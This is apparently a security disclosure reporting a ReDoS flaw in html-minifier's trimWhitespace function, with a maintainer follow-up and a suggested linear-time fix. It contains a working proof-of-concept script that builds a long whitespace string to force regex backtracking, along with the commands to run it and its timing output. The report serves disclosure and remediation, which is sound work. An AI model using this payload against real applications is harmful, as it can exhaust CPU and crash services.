✍️ Description
A ReDoS (regular expression denial of service) flaw was found in the html-minifier. An attacker that is able to provide crafted input to the trimWhitespace function may cause an application to consume an excessive amount of CPU.
🕵️♂️ Proof of Concept
Create the following poc.js:

```js
// PoC.js
var htmlMinifier = require("html-minifier");

// Build "1" + n spaces + "1": a long whitespace run that does not end the
// string, which is what makes the trimWhitespace regex backtrack.
function build_blank(n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

var time = Date.now();
htmlMinifier.minify(build_blank(50000));
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);
```
Execute the following commands in another terminal:

```sh
npm i html-minifier
node poc.js
```
Check the output:

```
time_cost: 3794
```
Ideally, the time cost should be 1-10 milliseconds.
💥 Impact
This vulnerability is capable of exhausting system resources and leading to crashes.
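To show why the trimWhitespace call in the report degrades on "1" + spaces + "1", here is an added example (not html-minifier's own code) placing an end-anchored whitespace regex of the kind that backtracks quadratically next to an index-based trim that stays linear on any input. The regex is a representative pattern, not a quote of the project's source; `buildBlank`, `compare` and the function names are this example's own.

```javascript
"use strict";

// Regex form: the engine retries `[ws]+$` from every whitespace position; on
// "1" + N spaces + "1" each attempt greedily scans to the end, fails `$` on
// the final "1", then backtracks through the run, giving O(N^2) work.
const WS_RUN_START = /^[ \n\r\t\f]+/;
const WS_RUN_END = /[ \n\r\t\f]+$/;
function trimWhitespaceRegex(str) {
  return str.replace(WS_RUN_START, "").replace(WS_RUN_END, "");
}

// Linear form: walk inward from each end over the same character set. Every
// character is inspected at most once, so cost is O(N) regardless of shape.
const WS = new Set([" ", "\n", "\r", "\t", "\f"]);
function trimWhitespaceLinear(str) {
  let start = 0;
  let end = str.length;
  while (start < end && WS.has(str[start])) start++;
  while (end > start && WS.has(str[end - 1])) end--;
  return str.slice(start, end);
}

// Constructed input in the shape of the PoC: "1", n spaces, "1".
function buildBlank(n) {
  return "1" + " ".repeat(n) + "1";
}

// Time both trims on the same input and report whether their outputs agree,
// so the linear version can be checked as a drop-in replacement.
function compare(n) {
  const input = buildBlank(n);
  let t = Date.now();
  const viaRegex = trimWhitespaceRegex(input);
  const regexMs = Date.now() - t;
  t = Date.now();
  const viaLinear = trimWhitespaceLinear(input);
  const linearMs = Date.now() - t;
  return { regexMs, linearMs, same: viaRegex === viaLinear };
}

if (typeof require !== "undefined" && require.main === module) {
  // 20000 is enough to see the gap; scale n up to reproduce the PoC timing.
  console.log(compare(20000));
}
```

The regex timing grows with the square of n while the linear trim stays in the low milliseconds even at the PoC's 50000.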
Hi team, I reported a security issue on huntr 9 months ago, but I didn't get any response: https://www.huntr.dev/bounties/e98b8228-41bc-4304-afd6-256c6dfebf9e/
Please validate this issue using Mark as Valid. Thanks.
Affected code: html-minifier/src/htmlminifier.js, line 12 at commit e15a892
Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753